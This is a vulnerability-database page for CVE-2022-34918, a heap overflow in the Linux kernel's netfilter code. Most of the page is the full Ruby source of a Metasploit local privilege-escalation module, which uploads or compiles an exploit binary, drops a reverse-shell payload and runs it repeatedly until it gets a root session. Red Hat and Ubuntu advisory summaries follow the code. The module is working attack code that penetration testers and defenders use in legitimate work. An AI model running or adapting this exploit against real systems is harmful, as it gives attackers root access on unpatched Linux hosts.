Headline
Netfilter nft_set_elem_init Heap Overflow Privilege Escalation
An issue was discovered in the Linux kernel through version 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges. The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access. The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.
# frozen_string_literal: true### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Common include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Post::Linux::Compile include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation', 'Description' => %q{ An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges. The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access. The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC 'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates ], 'DisclosureDate' => '2022-02-07', 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'SessionTypes' => %w[meterpreter shell], 'DefaultOptions' => { 'Payload' => 'linux/x64/shell_reverse_tcp', 'PrependSetresuid' => true, 'PrependSetresgid' => true, 'PrependFork' => true, 'WfsDelay' => 30 }, 'Targets' => [['Auto', {}]], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes. 'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted. 'SideEffects' => [ARTIFACTS_ON_DISK] }, 'References' => [ ['CVE', '2022-34918'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'], ['URL', 'https://ubuntu.com/security/CVE-2022-34918'], ['URL', 'https://www.randorisec.fr/crack-linux-firewall/'], ['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC'] ] ) ) register_options( [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]), OptInt.new('MAX_TRIES', [ true, 'Number of times to execute the exploit', 5]) ] ) register_advanced_options( [ OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp']) ] ) end def base_dir datastore['WritableDir'] end def upload_exploit_binary @executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf')) register_file_for_cleanup(@executable_path) end def upload_payload_binary @payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) upload_and_chmodx(@payload_path, generate_payload_exe) register_file_for_cleanup(@payload_path) end def upload_source @exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) mkdir(@exploit_source_path) register_dir_for_cleanup(@exploit_source_path) dirs = [ '.' ] until dirs.empty? current_dir = dirs.pop dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir) Dir.entries(dir_full_path).each do |ent| next if ent == '.' || ent == '..' full_path_host = ::File.join(dir_full_path, ent) relative_path = ::File.join(current_dir, ent) full_path_target = ::File.join(@exploit_source_path, current_dir, ent) if File.file?(full_path_host) vprint_status("Uploading #{relative_path} to #{full_path_target}") upload_file(full_path_target, full_path_host) elsif File.directory?(full_path_host) vprint_status("Creating the directory #{full_path_target}") mkdir(full_path_target) dirs.push(relative_path) else print_error("#{full_path_host} doesn't look like a file or a directory") end end end end def compile_source fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make') info = cmd_exec("make -C #{@exploit_source_path}") vprint_status(info) @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf') if exists?(@executable_path) chmod(@executable_path, 0o700) unless executable?(@executable_path) print_good('Compilation was successful') else fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)') end end def run_payload success = false 1.upto(datastore['MAX_TRIES']) do |i| vprint_status "Execution attempt ##{i}" info = cmd_exec(@executable_path, @payload_path) info.each_line do |line| vprint_status(line.chomp) end if session_created? success = true break end sleep 3 end if success print_good('A session has been created') else print_bad('Exploit has failed') end end def get_external_source_code(cve, file) file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}") ::File.binread(file_path) end def module_check release = kernel_release version = "#{release} #{kernel_version.split(' ').first}" ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten if ubuntu_kernels.empty? fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.') end fail_with(Failure::NoTarget, "No offsets for '#{version}'") unless ubuntu_kernels.include?(version) fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir) fail_with(Failure::BadConfig, '/tmp is not writable.') unless writable?('/tmp') if is_root? fail_with(Failure::BadConfig, 'Session already has root privileges.') end end def check config = kernel_config return CheckCode::Unknown('Could not retrieve kernel config') if config.nil? return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y') return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled? return CheckCode::Safe('LKRG is installed') if lkrg_installed? arch = kernel_hardware return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64') release = kernel_release version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl.to_i) return CheckCode::Appears # ("The kernel #{version} appears to be vulnerable, but no offsets are available for this version") end CheckCode::Safe end def exploit module_check unless datastore['ForceExploit'] if datastore['COMPILE'] == 'True' || (datastore['COMPILE'] == 'Auto' && command_exists?('make')) print_status('Uploading the exploit source code') upload_source print_status('Compiling the exploit source code') compile_source else print_status('Dropping pre-compiled binaries to system...') upload_exploit_binary end print_status('Uploading payload...') upload_payload_binary print_status('Running payload on remote system...') run_payload endend
Related news
By Habiba Rashid At the time of writing, all reported fake repositories have been taken down and the malicious PoC has been removed from GitHub. This is a post from HackRead.com Read the original post: Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!
Red Hat Security Advisory 2022-6592-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a heap overflow vulnerability.
Red Hat Security Advisory 2022-6582-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include buffer overflow and heap overflow vulnerabilities.
Red Hat Security Advisory 2022-6610-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include buffer overflow and heap overflow vulnerabilities.
An update for kernel is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2078: kernel: Vulnerability of buffer overflow in nft_set_desc_concat_parse() * CVE-2022-34918: kernel: heap overflow in nft_set_elem_init()
An update for kernel-rt is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2078: kernel: Vulnerability of buffer overflow in nft_set_desc_concat_parse() * CVE-2022-34918: kernel: heap overflow in nft_set_elem_init()
An update for kpatch-patch is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-34918: kernel: heap overflow in nft_set_elem_init()
Aaron Adams discovered that the netfilter subsystem in the Linux kernel did not properly handle the removal of stateful expressions in some situations, leading to a use-after-free vulnerability. Ziming Zhang discovered that the netfilter subsystem in the Linux kernel did not properly validate sets with multiple ranged fields. It was discovered that the implementation of POSIX timers in the Linux kernel did not properly clean up timers in some situations. Various other vulnerabilities were also discovered.
Ubuntu Security Notice 5566-1 - Zhenpeng Lin discovered that the network packet scheduler implementation in the Linux kernel did not properly remove all references to a route filter before freeing it in some situations. A local attacker could use this to cause a denial of service or execute arbitrary code. It was discovered that the netfilter subsystem of the Linux kernel did not prevent one nft object from referencing an nft set in another nft table, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or execute arbitrary code.
Ubuntu Security Notice 5544-1 - It was discovered that the Atheros ath9k wireless device driver in the Linux kernel did not properly handle some error conditions, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Felix Fu discovered that the Sun RPC implementation in the Linux kernel did not properly handle socket states, leading to a use-after-free vulnerability. A remote attacker could possibly use this to cause a denial of service or execute arbitrary code.
An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.